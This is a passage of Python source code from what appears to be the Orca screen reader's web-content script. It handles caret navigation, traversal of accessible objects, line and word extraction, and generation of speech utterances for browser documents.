prevText = self.utilities.queryNonEmptyText(prevItem[0])
if prevText:
string = prevText.getText(prevItem[1], prevItem[2])
if label.endswith(string):
lineContents.pop()
length = len(label) - len(string)
label = label[0:length]
else:
break
index -= 1
else:
text = self.utilities.queryNonEmptyText(item[0])
if text:
string = text.getText(item[1], item[2])
if not len(string.strip()):
continue
lineContents.append(item)
return lineContents
def getPageSummary(self, obj):
"""Returns the quantity of headings, forms, tables, visited links,
and unvisited links on the page containing obj.
"""
docframe = self.utilities.documentFrame()
col = docframe.queryCollection()
headings = 0
forms = 0
tables = 0
vlinks = 0
uvlinks = 0
percentRead = None
stateset = pyatspi.StateSet()
roles = [pyatspi.ROLE_HEADING, pyatspi.ROLE_LINK, pyatspi.ROLE_TABLE,
pyatspi.ROLE_FORM]
rule = col.createMatchRule(stateset.raw(), col.MATCH_NONE,
"", col.MATCH_NONE,
roles, col.MATCH_ANY,
"", col.MATCH_NONE,
False)
matches = col.getMatches(rule, col.SORT_ORDER_CANONICAL, 0, True)
col.freeMatchRule(rule)
for obj in matches:
role = obj.getRole()
if role == pyatspi.ROLE_HEADING:
headings += 1
elif role == pyatspi.ROLE_FORM:
forms += 1
elif role == pyatspi.ROLE_TABLE \
and not self.utilities.isLayoutOnly(obj):
tables += 1
elif role == pyatspi.ROLE_LINK:
if obj.getState().contains(pyatspi.STATE_VISITED):
vlinks += 1
else:
uvlinks += 1
return [headings, forms, tables, vlinks, uvlinks, percentRead]
####################################################################
# #
# Methods to find previous and next objects. #
# #
####################################################################
def findFirstCaretContext(self, obj, characterOffset):
"""Given an object and a character offset, find the first
[obj, characterOffset] that is actually presenting something
on the display. The reason we do this is that the
[obj, characterOffset] passed in may actually be pointing
to an embedded object character. In those cases, we dig
into the hierarchy to find the 'real' thing.
Arguments:
-obj: an accessible object
-characterOffset: the offset of the character where to start
looking for real text
Returns [obj, characterOffset] that points to real content.
"""
try:
role = obj.getRole()
except:
return [None, -1]
if role == pyatspi.ROLE_TABLE and obj.childCount:
child = obj[0]
if child.getRole() in [pyatspi.ROLE_CAPTION, pyatspi.ROLE_LIST]:
obj = child
else:
obj = obj.queryTable().getAccessibleAt(0, 0)
return self.findFirstCaretContext(obj, 0)
text = self.utilities.queryNonEmptyText(obj)
if not text:
return [obj, -1]
if role == pyatspi.ROLE_LIST_ITEM and not characterOffset and obj.name:
words = obj.name.split()
characterOffset = len(words[0])
character = text.getText(characterOffset, characterOffset + 1)
if len(character) == 1 and character != self.EMBEDDED_OBJECT_CHARACTER:
return [obj, characterOffset]
try:
childIndex = self.getChildIndex(obj, characterOffset)
child = obj[childIndex]
# Handle bogus empty paragraphs. Bug 677615.
# Make that bogus empty text objects.
textRoles = [pyatspi.ROLE_HEADING,
pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_SECTION]
if child.getRole() in textRoles \
and not self.utilities.queryNonEmptyText(child):
return self.findFirstCaretContext(obj, characterOffset + 1)
return self.findFirstCaretContext(child, 0)
except:
return [obj, -1]
return [obj, characterOffset]
def findNextCaretInOrder(self, obj=None,
startOffset=-1,
includeNonText=True):
"""Given an object at a character offset, return the next
caret context following an in-order traversal rule.
Arguments:
- root: the Accessible to start at. If None, starts at the
document frame.
- startOffset: character position in the object text field
(if it exists) to start at. Defaults to -1, which means
start at the beginning - that is, the next character is the
first character in the object.
- includeNonText: If False, only land on objects that support the
accessible text interface; otherwise, include logical leaf
nodes like check boxes, combo boxes, etc.
Returns [obj, characterOffset] or [None, -1]
"""
if not obj:
obj = self.utilities.documentFrame()
if not obj or not self.inDocumentContent(obj):
return [None, -1]
if obj.getRole() == pyatspi.ROLE_INVALID:
debug.println(debug.LEVEL_SEVERE, \
"findNextCaretInOrder: object is invalid")
return [None, -1]
# We do not want to descend objects of certain role types.
#
doNotDescend = obj.getState().contains(pyatspi.STATE_FOCUSABLE) \
and obj.getRole() in [pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_LIST]
text = self.utilities.queryNonEmptyText(obj)
if text:
unicodeText = self.utilities.unicodeText(obj)
# Delete the final space character if we find it. Otherwise,
# we'll arrow to it. (We can't just strip the string otherwise
# we skip over blank lines that one could otherwise arrow to.)
#
if len(unicodeText) > 1 and unicodeText[-1] == " ":
unicodeText = unicodeText[0:len(unicodeText) - 1]
nextOffset = startOffset + 1
while 0 <= nextOffset < len(unicodeText):
if unicodeText[nextOffset] != self.EMBEDDED_OBJECT_CHARACTER:
return [obj, nextOffset]
elif obj.childCount:
try:
child = obj[self.getChildIndex(obj, nextOffset)]
except:
break
if child:
return self.findNextCaretInOrder(child,
-1,
includeNonText)
else:
nextOffset += 1
else:
nextOffset += 1
# If this is a list or combo box in an HTML form, we don't want
# to place the caret inside the list, but rather treat the list
# as a single object. Otherwise, if it has children, look there.
#
elif obj.childCount and obj[0] and not doNotDescend:
try:
return self.findNextCaretInOrder(obj[0],
-1,
includeNonText)
except:
pass
elif includeNonText and (startOffset < 0):
extents = obj.queryComponent().getExtents(0)
if (extents.width != 0) and (extents.height != 0):
return [obj, 0]
# If we're here, we need to start looking up the tree,
# going no higher than the document frame, of course.
#
documentFrame = self.utilities.documentFrame()
if self.utilities.isSameObject(obj, documentFrame):
return [None, -1]
while obj.parent and obj != obj.parent:
characterOffsetInParent = \
self.utilities.characterOffsetInParent(obj)
if characterOffsetInParent >= 0:
return self.findNextCaretInOrder(obj.parent,
characterOffsetInParent,
includeNonText)
else:
index = obj.getIndexInParent() + 1
if index < obj.parent.childCount:
try:
return self.findNextCaretInOrder(
obj.parent[index],
-1,
includeNonText)
except:
pass
obj = obj.parent
return [None, -1]
def findPreviousCaretInOrder(self,
obj=None,
startOffset=-1,
includeNonText=True):
"""Given an object an a character offset, return the previous
caret context following an in order traversal rule.
Arguments:
- root: the Accessible to start at. If None, starts at the
document frame.
- startOffset: character position in the object text field
(if it exists) to start at. Defaults to -1, which means
start at the end - that is, the previous character is the
last character of the object.
Returns [obj, characterOffset] or [None, -1]
"""
if not obj:
obj = self.utilities.documentFrame()
if not obj or not self.inDocumentContent(obj):
return [None, -1]
if obj.getRole() == pyatspi.ROLE_INVALID:
debug.println(debug.LEVEL_SEVERE, \
"findPreviousCaretInOrder: object is invalid")
return [None, -1]
# We do not want to descend objects of certain role types.
#
doNotDescend = obj.getState().contains(pyatspi.STATE_FOCUSABLE) \
and obj.getRole() in [pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_LIST]
text = self.utilities.queryNonEmptyText(obj)
if text:
unicodeText = self.utilities.unicodeText(obj)
# Delete the final space character if we find it. Otherwise,
# we'll arrow to it. (We can't just strip the string otherwise
# we skip over blank lines that one could otherwise arrow to.)
#
if len(unicodeText) > 1 and unicodeText[-1] == " ":
unicodeText = unicodeText[0:len(unicodeText) - 1]
if (startOffset == -1) or (startOffset > len(unicodeText)):
startOffset = len(unicodeText)
previousOffset = startOffset - 1
while previousOffset >= 0:
if unicodeText[previousOffset] \
!= self.EMBEDDED_OBJECT_CHARACTER:
return [obj, previousOffset]
elif obj.childCount:
child = obj[self.getChildIndex(obj, previousOffset)]
if child:
return self.findPreviousCaretInOrder(child,
-1,
includeNonText)
else:
previousOffset -= 1
else:
previousOffset -= 1
# If this is a list or combo box in an HTML form, we don't want
# to place the caret inside the list, but rather treat the list
# as a single object. Otherwise, if it has children, look there.
#
elif obj.childCount and obj[obj.childCount - 1] and not doNotDescend:
try:
return self.findPreviousCaretInOrder(
obj[obj.childCount - 1],
-1,
includeNonText)
except:
pass
elif includeNonText and (startOffset < 0):
extents = obj.queryComponent().getExtents(0)
if (extents.width != 0) and (extents.height != 0):
return [obj, 0]
# If we're here, we need to start looking up the tree,
# going no higher than the document frame, of course.
#
documentFrame = self.utilities.documentFrame()
if self.utilities.isSameObject(obj, documentFrame):
return [None, -1]
while obj.parent and obj != obj.parent:
characterOffsetInParent = \
self.utilities.characterOffsetInParent(obj)
if characterOffsetInParent >= 0:
return self.findPreviousCaretInOrder(obj.parent,
characterOffsetInParent,
includeNonText)
else:
index = obj.getIndexInParent() - 1
if index >= 0:
try:
return self.findPreviousCaretInOrder(
obj.parent[index],
-1,
includeNonText)
except:
pass
obj = obj.parent
return [None, -1]
def findPreviousObject(self, obj, documentFrame):
"""Finds the object prior to this one, where the tree we're
dealing with is a DOM and 'prior' means the previous object
in a linear presentation sense.
Arguments:
-obj: the object where to start.
"""
previousObj = None
characterOffset = 0
# If the object is the document frame, the previous object is
# the one that follows us relative to our offset.
#
if self.utilities.isSameObject(obj, documentFrame):
[obj, characterOffset] = self.getCaretContext()
if not obj:
return None
index = obj.getIndexInParent() - 1
if (index < 0):
if not self.utilities.isSameObject(obj, documentFrame):
previousObj = obj.parent
else:
# We're likely at the very end of the document
# frame.
previousObj = self.getLastObject(documentFrame)
else:
# [[[TODO: HACK - WDW defensive programming because Gecko
# ally hierarchies are not always working. Objects say
# they have children, but these children don't exist when
# we go to get them. So...we'll just keep going backwards
# until we find a real child that we can work with.]]]
#
while not isinstance(previousObj,
pyatspi.Accessibility.Accessible) \
and index >= 0:
previousObj = obj.parent[index]
index -= 1
# Now that we're at a child we can work with, we need to
# look at it further. It could be the root of a hierarchy.
# In that case, the last child in this hierarchy is what
# we want. So, we dive down the 'right hand side' of the
# tree to get there.
#
# [[[TODO: HACK - WDW we need to be defensive because of
# Gecko's broken a11y hierarchies, so we make this much
# more complex than it really has to be.]]]
#
if not previousObj:
if not self.utilities.isSameObject(obj, documentFrame):
previousObj = obj.parent
else:
previousObj = obj
role = previousObj.getRole()
if role == pyatspi.ROLE_MENU_ITEM:
return previousObj.parent.parent
elif role == pyatspi.ROLE_LIST_ITEM:
parent = previousObj.parent
if parent.getState().contains(pyatspi.STATE_FOCUSABLE) \
and not self.isAriaWidget(parent):
return parent
while previousObj.childCount:
role = previousObj.getRole()
state = previousObj.getState()
if role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU]:
break
elif role == pyatspi.ROLE_LIST \
and state.contains(pyatspi.STATE_FOCUSABLE) \
and not self.isAriaWidget(previousObj):
break
elif previousObj.childCount > 1000:
break
index = previousObj.childCount - 1
while index >= 0:
child = previousObj[index]
childOffset = self.utilities.characterOffsetInParent(child)
if isinstance(child, pyatspi.Accessibility.Accessible) \
and not (self.utilities.isSameObject(
previousObj, documentFrame) \
and childOffset > characterOffset):
previousObj = child
break
else:
index -= 1
if index < 0:
break
if self.utilities.isSameObject(previousObj, documentFrame):
previousObj = None
return previousObj
def findNextObject(self, obj, documentFrame):
"""Finds the object after to this one, where the tree we're
dealing with is a DOM and 'next' means the next object
in a linear presentation sense.
Arguments:
-obj: the object where to start.
"""
nextObj = None
characterOffset = 0
# If the object is the document frame, the next object is
# the one that follows us relative to our offset.
#
if self.utilities.isSameObject(obj, documentFrame):
[obj, characterOffset] = self.getCaretContext()
if not obj:
return None
# If the object has children, we'll choose the first one,
# unless it's a combo box or a focusable HTML list.
#
# [[[TODO: HACK - WDW Gecko's broken hierarchies make this
# a bit of a challenge.]]]
#
role = obj.getRole()
if role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU]:
descend = False
elif role == pyatspi.ROLE_LIST \
and obj.getState().contains(pyatspi.STATE_FOCUSABLE) \
and not self.isAriaWidget(obj):
descend = False
elif obj.childCount > 1000:
descend = False
else:
descend = True
index = 0
while descend and index < obj.childCount:
child = obj[index]
# bandaid for Gecko broken hierarchy
if child is None:
index += 1
continue
childOffset = self.utilities.characterOffsetInParent(child)
if isinstance(child, pyatspi.Accessibility.Accessible) \
and not (self.utilities.isSameObject(obj, documentFrame) \
and childOffset < characterOffset):
nextObj = child
break
else:
index += 1
# Otherwise, we'll look to the next sibling.
#
# [[[TODO: HACK - WDW Gecko's broken hierarchies make this
# a bit of a challenge.]]]
#
if not nextObj and obj.getIndexInParent() != -1:
index = obj.getIndexInParent() + 1
while index < obj.parent.childCount:
child = obj.parent[index]
if isinstance(child, pyatspi.Accessibility.Accessible):
nextObj = child
break
else:
index += 1
# If there is no next sibling, we'll move upwards.
#
candidate = obj
while not nextObj:
# Go up until we find a parent that might have a sibling to
# the right for us.
#
while candidate and candidate.parent \
and candidate.getIndexInParent() >= \
candidate.parent.childCount - 1 \
and not self.utilities.isSameObject(candidate, documentFrame):
candidate = candidate.parent
# Now...let's get the sibling.
#
# [[[TODO: HACK - WDW Gecko's broken hierarchies make this
# a bit of a challenge.]]]
#
if not self.utilities.isSameObject(candidate, documentFrame):
index = candidate.getIndexInParent() + 1
while index < candidate.parent.childCount:
child = candidate.parent[index]
if isinstance(child, pyatspi.Accessibility.Accessible):
nextObj = child
break
else:
index += 1
# We've exhausted trying to get all the children, but
# Gecko's broken hierarchy has failed us for all of
# them. So, we need to go higher.
#
candidate = candidate.parent
else:
break
return nextObj
####################################################################
# #
# Methods to get information about current object. #
# #
####################################################################
def clearCaretContext(self):
"""Deletes all knowledge of a character context for the current
document frame."""
documentFrame = self.utilities.documentFrame()
self._destroyLineCache()
try:
del self._documentFrameCaretContext[hash(documentFrame)]
except:
pass
def setCaretContext(self, obj=None, characterOffset=-1):
"""Sets the caret context for the current document frame."""
# We keep a context for each page tab shown.
# [[[TODO: WDW - probably should figure out how to destroy
# these contexts when a tab is killed.]]]
#
documentFrame = self.utilities.documentFrame()
if not documentFrame:
return
self._documentFrameCaretContext[hash(documentFrame)] = \
[obj, characterOffset]
self._updateLineCache(obj, characterOffset)
def getTextLineAtCaret(self, obj, offset=None):
"""Gets the portion of the line of text where the caret (or optional
offset) is. This is an override to accomodate the intricities of our
caret navigation management and to deal with bogus line information
being returned by Gecko when using getTextAtOffset.
Argument:
- obj: an Accessible object that implements the AccessibleText
interface
- offset: an optional caret offset to use.
Returns the [string, caretOffset, startOffset] for the line of text
where the caret is.
"""
# We'll let the default script handle entries and other entry-like
# things (e.g. the text portion of a dojo spin button).
#
if not self.inDocumentContent(obj) \
or self.utilities.isEntry(obj) \
or self.utilities.isPasswordText(obj):
return default.Script.getTextLineAtCaret(self, obj, offset)
# Find the current line.
#
contextObj, contextOffset = self.getCaretContext()
contextOffset = max(0, contextOffset)
contents = self.currentLineContents
if self.findObjectOnLine(contextObj, contextOffset, contents) < 0:
contents = self.getLineContentsAtOffset(contextObj, contextOffset)
# Determine the caretOffset.
#
if self.utilities.isSameObject(obj, contextObj):
caretOffset = contextOffset
else:
try:
text = obj.queryText()
except:
caretOffset = 0
else:
caretOffset = text.caretOffset
# The reason we typically use this method is to present the contents
# of the current line, so our initial assumption is that the obj
# being passed in is also on this line. We'll try that first. We
# might have multiple instances of obj, in which case we'll have
# to consider the offset as well.
#
for content in contents:
candidate, startOffset, endOffset, string = content
if self.utilities.isSameObject(candidate, obj) \
and (offset is None or (startOffset <= offset <= endOffset)):
return string, caretOffset, startOffset
# If we're still here, obj presumably is not on this line. This
# shouldn't happen, but if it does we'll let the default script
# handle it for now.
#
#print "getTextLineAtCaret failed"
return default.Script.getTextLineAtCaret(self, obj, offset)
def searchForCaretLocation(self, acc):
"""Attempts to locate the caret on the page independent of our
caret context. This functionality is needed when a page loads
and the URL is for a fragment (anchor, id, named object) within
that page.
Arguments:
- acc: The top-level accessible in which we suspect to find the
caret (most likely the document frame).
Returns the [obj, caretOffset] containing the caret if it can
be determined. Otherwise [None, -1] is returned.
"""
context = [None, -1]
while acc:
try:
offset = acc.queryText().caretOffset
except:
acc = None
else:
context = [acc, offset]
childIndex = self.getChildIndex(acc, offset)
if childIndex >= 0 and acc.childCount:
acc = acc[childIndex]
else:
break
return context
def getCaretContext(self, includeNonText=True):
"""Returns the current [obj, caretOffset] if defined. If not,
it returns the first [obj, caretOffset] found by an in order
traversal from the beginning of the document."""
# We keep a context for each page tab shown.
# [[[TODO: WDW - probably should figure out how to destroy
# these contexts when a tab is killed.]]]
#
documentFrame = self.utilities.documentFrame()
if not documentFrame:
return [None, -1]
try:
return self._documentFrameCaretContext[hash(documentFrame)]
except:
# If we don't have a context, we should attempt to see if we
# can find the caret first. Failing that, we'll start at the
# top.
#
[obj, caretOffset] = self.searchForCaretLocation(documentFrame)
self._documentFrameCaretContext[hash(documentFrame)] = \
self.findNextCaretInOrder(obj,
max(-1, caretOffset - 1),
includeNonText)
[obj, caretOffset] = \
self._documentFrameCaretContext[hash(documentFrame)]
return [obj, caretOffset]
def getCharacterAtOffset(self, obj, characterOffset):
"""Returns the character at the given characterOffset in the
given object or None if the object does not implement the
accessible text specialization.
"""
try:
unicodeText = self.utilities.unicodeText(obj)
return unicodeText[characterOffset]
except:
return None
def getWordContentsAtOffset(self, obj, characterOffset, boundary=None):
"""Returns an ordered list where each element is composed of an
[obj, startOffset, endOffset, string] tuple. The list is created
via an in-order traversal of the document contents starting at
the given object and characterOffset. The first element in
the list represents the beginning of the word. The last
element in the list represents the character just before the
beginning of the next word.
Arguments:
-obj: the object to start at
-characterOffset: the characterOffset in the object
-boundary: the pyatsi word boundary to use
"""
if not obj:
return []
boundary = boundary or pyatspi.TEXT_BOUNDARY_WORD_START
text = self.utilities.queryNonEmptyText(obj)
if text:
word = text.getTextAtOffset(characterOffset, boundary)
if word[1] < characterOffset <= word[2]:
characterOffset = word[1]
contents = self.utilities.getObjectsFromEOCs(obj, characterOffset, boundary)
if len(contents) > 1 \
and contents[0][0].getRole() == pyatspi.ROLE_LIST_ITEM:
contents = [contents[0]]
return contents
def getLineContentsAtOffset(self, obj, offset):
"""Returns an ordered list where each element is composed of an
[obj, startOffset, endOffset, string] tuple. The list is created
via an in-order traversal of the document contents starting at
the given object and characterOffset. The first element in
the list represents the beginning of the line. The last
element in the list represents the character just before the
beginning of the next line.
Arguments:
-obj: the object to start at
-offset: the character offset in the object
"""
if not obj:
return []
# If it's an ARIA widget, we want the default generators to give
# us all the details.
#
if not self.isNavigableAria(obj):
if not self.isAriaWidget(obj):
obj = obj.parent
objects = [[obj, 0, 1, ""]]
ext = obj.queryComponent().getExtents(0)
extents = [ext.x, ext.y, ext.width, ext.height]
for i in range(obj.getIndexInParent() + 1, obj.parent.childCount):
newObj = obj.parent[i]
ext = newObj.queryComponent().getExtents(0)
newExtents = [ext.x, ext.y, ext.width, ext.height]
if self.onSameLine(extents, newExtents):
objects.append([newObj, 0, 1, ""])
else:
break
for i in range(obj.getIndexInParent() - 1, -1, -1):
newObj = obj.parent[i]
ext = newObj.queryComponent().getExtents(0)
newExtents = [ext.x, ext.y, ext.width, ext.height]
if self.onSameLine(extents, newExtents):
objects[0:0] = [[newObj, 0, 1, ""]]
else:
break
return objects
boundary = pyatspi.TEXT_BOUNDARY_LINE_START
# Find the beginning of this line w.r.t. this object.
#
text = self.utilities.queryNonEmptyText(obj)
if not text:
offset = 0
else:
if offset == -1:
offset = 0
[line, start, end] = text.getTextAtOffset(offset, boundary)
# If we're still seeing bogusity, which we only seem to see when
# moving up, locate the previous character and use it instead.
#
if not (start <= offset < end):
pObj, pOffset = self.findPreviousCaretInOrder(obj, end)
if pObj:
obj, offset = pObj, pOffset
text = self.utilities.queryNonEmptyText(obj)
if text:
[line, start, end] = \
text.getTextAtOffset(offset, boundary)
if start <= offset < end:
# So far so good. If the line doesn't begin with an EOC, we
# have our first character for this object.
#
try:
isEOC = line.startswith(self.EMBEDDED_OBJECT_CHARACTER)
except:
isEOC = False
if not isEOC:
offset = start
else:
# The line may begin with a link, or it may begin with
# an anchor which makes this text something one can jump
# to via a link. Anchors are bad.
#
childIndex = self.getChildIndex(obj, start)
if childIndex >= 0:
child = obj[childIndex]
childText = self.utilities.queryNonEmptyText(child)
if not childText:
# It's probably an anchor. It might be something
# else, but that's okay because we do another
# check later to make sure we have everything on
# the left. Set the offset to just after the
# assumed anchor.
#
offset = start + 1
elif obj.getRole() == pyatspi.ROLE_PARAGRAPH \
and child.getRole() == pyatspi.ROLE_PARAGRAPH:
# We don't normally see nested paragraphs. But
# they occur at least when a paragraph begins
# with a multi-line-high character. If we set
# the beginning of this line to that initial
# character, we'll get stuck. See bug 592383.
#
if end - start > 1 and end - offset == 1:
# We must be Up Arrowing. Set the offset to
# just past the EOC so that we present the
# line rather than saying "blank."
#
offset = start + 1
else:
# It's a link that ends on our left. Who knows
# where it starts? Might be on the previous
# line. We will assume that it begins on this
# line if the start offset is 0. However, it
# might be an image link which occupies more
# than just this line. To be safe, we'll also
# look to be sure that the text does not start
# with an embedded object character. See bug
# 587794.
#
cOffset = childText.characterCount - 1
[cLine, cStart, cEnd] = \
childText.getTextAtOffset(cOffset, boundary)
if cStart == 0 \
and not cLine.startswith(\
self.EMBEDDED_OBJECT_CHARACTER) \
and obj.getRole() != pyatspi.ROLE_PANEL:
# It starts on this line.
#
obj = child
offset = cStart
else:
offset = start + 1
extents = self.getExtents(obj, offset, offset + 1)
# Get the objects on this line.
#
objects = self.utilities.getObjectsFromEOCs(obj, offset, boundary)
# Check for things on the left.
#
lastExtents = (0, 0, 0, 0)
done = False
while not done:
[firstObj, start, end, string] = objects[0]
[prevObj, pOffset] = self.findPreviousCaretInOrder(firstObj, start)
if not prevObj or self.utilities.isSameObject(prevObj, firstObj):
break
text = self.utilities.queryNonEmptyText(prevObj)
if text:
line = text.getTextAtOffset(pOffset, boundary)
pOffset = line[1]
# If a line begins with a link, getTextAtOffset might
# return a zero-length string. If we have a valid offset
# increment the pOffset by 1 before getting the extents.
#
if line[1] > 0 and line[1] == line[2]:
pOffset += 1
prevExtents = self.getExtents(prevObj, pOffset, pOffset + 1)
if self.onSameLine(extents, prevExtents) \
and extents != prevExtents \
and lastExtents != prevExtents:
toAdd = self.utilities.getObjectsFromEOCs(prevObj, pOffset, boundary)
toAdd = [x for x in toAdd if x not in objects]
if not toAdd:
break
# Depending on the line, there's a chance that we got our
# current object as part of toAdd. Check for dupes and just
# add up to the current object if we find them.
#
try:
index = toAdd.index(objects[0])
except:
index = len(toAdd)
objects[0:0] = toAdd[0:index]
else:
break
lastExtents = prevExtents
# Check for things on the right.
#
lastExtents = (0, 0, 0, 0)
done = False
while not done:
[lastObj, start, end, string] = objects[-1]
[nextObj, nOffset] = self.findNextCaretInOrder(lastObj, end)
if self.utilities.isSameObject(lastObj, nextObj):
[nextObj, nOffset] = \
self.findNextCaretInOrder(nextObj, nOffset)
if not nextObj or self.utilities.isSameObject(nextObj, lastObj):
break
text = self.utilities.queryNonEmptyText(nextObj)
if text:
line = text.getTextAtOffset(nOffset + 1, boundary)
nOffset = line[1]
nextExtents = self.getExtents(nextObj, nOffset, nOffset + 1)
if self.onSameLine(extents, nextExtents) \
and extents != nextExtents \
and lastExtents != nextExtents \
or nextExtents == (0, 0, 0, 0):
toAdd = self.utilities.getObjectsFromEOCs(nextObj, nOffset, boundary)
toAdd = [x for x in toAdd if x not in objects]
objects.extend(toAdd)
done = not toAdd
elif (nextObj.getRole() in [pyatspi.ROLE_SECTION,
pyatspi.ROLE_TABLE_CELL] \
and self.isUselessObject(nextObj)):
toAdd = self.utilities.getObjectsFromEOCs(nextObj, nOffset, boundary)
toAdd = [x for x in toAdd if x not in objects]
done = True
for item in toAdd:
itemExtents = self.getExtents(item[0], item[1], item[2])
if self.onSameLine(extents, itemExtents):
objects.append(item)
done = False
else:
done = True
if done:
break
else:
break
lastExtents = nextExtents
return objects
def getObjectContentsAtOffset(self, obj, characterOffset):
"""Returns an ordered list where each element is composed of
an [obj, startOffset, endOffset, string] tuple. The list is
created via an in-order traversal of the document contents
starting and stopping at the given object.
"""
return self.utilities.getObjectsFromEOCs(obj, characterOffset)
####################################################################
# #
# Methods to speak current objects. #
# #
####################################################################
# [[[TODO: WDW - this needs to be moved to the speech generator.]]]
#
def getACSS(self, obj, string):
"""Returns the ACSS to speak anything for the given obj."""
if obj.getRole() == pyatspi.ROLE_LINK:
acss = self.voices[settings.HYPERLINK_VOICE]
elif string and isinstance(string, str) \
and string.isupper() \
and string.strip().isalpha():
acss = self.voices[settings.UPPERCASE_VOICE]
else:
acss = self.voices[settings.DEFAULT_VOICE]
return acss
def getUtterancesFromContents(self, contents, speakRole=True):
"""Returns a list of [text, acss] tuples based upon the list
of [obj, startOffset, endOffset, string] tuples passed in.
Arguments:
-contents: a list of [obj, startOffset, endOffset, string] tuples
-speakRole: if True, speak the roles of objects
"""
if not len(contents):
return []
# Even if we want to speakRole, we don't want to do that for the
# document frame. And we're going to special-case headings so that
# that we don't overspeak heading role info, which we're in danger
# of doing if a heading includes links or images.
#
doNotSpeakRoles = [pyatspi.ROLE_DOCUMENT_FRAME,
pyatspi.ROLE_HEADING,
pyatspi.ROLE_LIST_ITEM,
pyatspi.ROLE_TEXT,
pyatspi.ROLE_ALERT]
utterances = []
prevObj = None
for content in contents:
[obj, startOffset, endOffset, string] = content
string = self.utilities.adjustForRepeats(string)
role = obj.getRole()
# If we don't have an object, there's nothing to do. If we have
# a string, but it consists solely of spaces, we have nothing to
# say. If it's a label for an object in our contents, we'll get
# that label via the speech generator for the object.
#
if not obj \
or len(string) and not len(string.strip(" ")) \
or self.isLabellingContents(obj, contents):
continue
# TODO - JD: this is a temporary and sad hack borrowed from
# clumpUtterances() which is no longer called by speakContents().
# Ultimately this sort of crap belongs in a generator (along with
# other similiar crap).
if string == "\n" and len(contents) == 1 \
and _settingsManager.getSetting('speakBlankLines'):
string = messages.BLANK
# Thunderbird now does something goofy with smileys in
# email: exposes them as a nested paragraph with a name
# consisting of the punctuation used to create the smiley
# and an empty accessible text object. This causes us to
# speak tutorial info for each smiley. :-( type in text.
#
elif role == pyatspi.ROLE_PARAGRAPH and not len(string):
string = obj.name
# We also see goofiness in some pages. That can cause
# SayAll by Sentence to spit up. See bug 591351. So
# if we still do not have string and if we've got
# more than object in contents, let's dump this one.
#
if len(contents) > 1 and not len(string):
continue
# If it is a "useless" image (i.e. not a link, no associated
# text), ignore it, unless it's the only thing here.
#
elif role == pyatspi.ROLE_IMAGE and self.isUselessObject(obj) \
and len(contents) > 1:
continue
# If the focused item is a checkbox or a radio button for which
# we had to infer the label, odds are that the inferred label is
# immediately to the right. Under these circumstances, we'll
# double speak the "label". It would be nice to avoid that.
# [[[TODO - JD: This is the simple version. It does not handle
# the possibility of the fake label being comprised of multiple
# objects.]]]
#
if prevObj \
and prevObj.getRole() in [pyatspi.ROLE_CHECK_BOX,
pyatspi.ROLE_RADIO_BUTTON] \
and prevObj.getState().contains(pyatspi.STATE_FOCUSED):
if self.labelInference.infer(prevObj) == string.strip():
continue
# If we don't have a string, then use the speech generator.
# Otherwise, we'll want to speak the string and possibly the
# role.
#
if not len(string) \
or self.utilities.isEntry(obj) \
or self.utilities.isPasswordText(obj):
rv = self.speechGenerator.generateSpeech(obj)
# Crazy crap to make clump and friends happy until we can
# kill them. (They don't deal well with what the speech
# generator provides.)
for item in rv:
if isinstance(item, str):
utterances.append([item, self.getACSS(obj, item)])
else:
utterances.append([string, self.getACSS(obj, string)])
if speakRole and not role in doNotSpeakRoles:
utterance = self.speechGenerator.getRoleName(obj)
if utterance:
utterances.append(utterance)
# If the object is a heading, or is contained within a heading,
# speak that role information at the end of the object.
#
isLastObject = (contents.index(content) == (len(contents) - 1))
isHeading = (role == pyatspi.ROLE_HEADING)
if speakRole and (isLastObject or isHeading):
if isHeading:
heading = obj
else:
heading = self.utilities.ancestorWithRole(
obj,
[pyatspi.ROLE_HEADING],
[pyatspi.ROLE_DOCUMENT_FRAME])
if heading:
utterance = self.speechGenerator.getRoleName(heading)
if utterance:
utterances.append(utterance)
prevObj = obj
return utterances
def clumpUtterances(self, utterances):
"""Returns a list of utterances clumped together by acss.
Arguments:
-utterances: unclumped utterances
-speakRole: if True, speak the roles of objects
"""
clumped = []
for [element, acss] in utterances:
if len(clumped) == 0:
clumped = [[element, acss]]
elif acss == clumped[-1][1] \
and isinstance(element, str) \
and isinstance(clumped[-1][0], str):
clumped[-1][0] = clumped[-1][0].rstrip(" ")
clumped[-1][0] += " " + element
else:
clumped.append([element, acss])
if (len(clumped) == 1) and (clumped[0][0] == "\n"):
if _settingsManager.getSetting('speakBlankLines'):
return [[messages.BLANK, self.voices[settings.SYSTEM_VOICE]]]
if len(clumped) and isinstance(clumped[-1][0], str):
clumped[-1][0] = clumped[-1][0].rstrip(" ")
return clumped
def speakContents(self, contents, speakRole=True):
"""Speaks each string in contents using the associated voice/acss"""
utterances = self.getUtterancesFromContents(contents, speakRole)
for utterance in utterances:
speech.speak(utterance, interrupt=False)
def speakCharacterAtOffset(self, obj, characterOffset):
"""Speaks the character at the given characterOffset in the
given object."""
character = self.getCharacterAtOffset(obj, characterOffset)
self.speakMisspelledIndicator(obj, characterOffset)
if obj:
if character and character != self.EMBEDDED_OBJECT_CHARACTER:
speech.speakCharacter(character,
self.getACSS(obj, character))
elif not self.utilities.isEntry(obj):
# We won't have a character if we move to the end of an
# entry (in which case we're not on a character and therefore
# have nothing to say), or when we hit a component with no
# text (e.g. checkboxes) or reset the caret to the parent's
# characterOffset (lists). In these latter cases, we'll just
# speak the entire component.
#
utterances = self.speechGenerator.generateSpeech(obj)
speech.speak(utterances)
####################################################################
# #
# Methods to navigate to previous and next objects. #
# #
####################################################################
def setCaretPosition(self, obj, characterOffset):
"""Sets the caret position to the given character offset in the
given object.
"""
if self.flatReviewContext:
self.toggleFlatReviewMode()
self.setCaretContext(obj, characterOffset)
try:
state = obj.getState()
except:
return
orca.setLocusOfFocus(None, obj, notifyScript=False)
if state.contains(pyatspi.STATE_FOCUSABLE):
obj.queryComponent().grabFocus()
text = self.utilities.queryNonEmptyText(obj)
if text:
text.setCaretOffset(characterOffset)
def moveToMouseOver(self, inputEvent):
"""Positions the caret offset to the next character or object
in the mouse over which has just appeared.
"""
if not self.lastMouseOverObject:
self.presentMessage(messages.MOUSE_OVER_NOT_FOUND)
return
if not self.inMouseOverObject:
obj = self.lastMouseOverObject
offset = 0
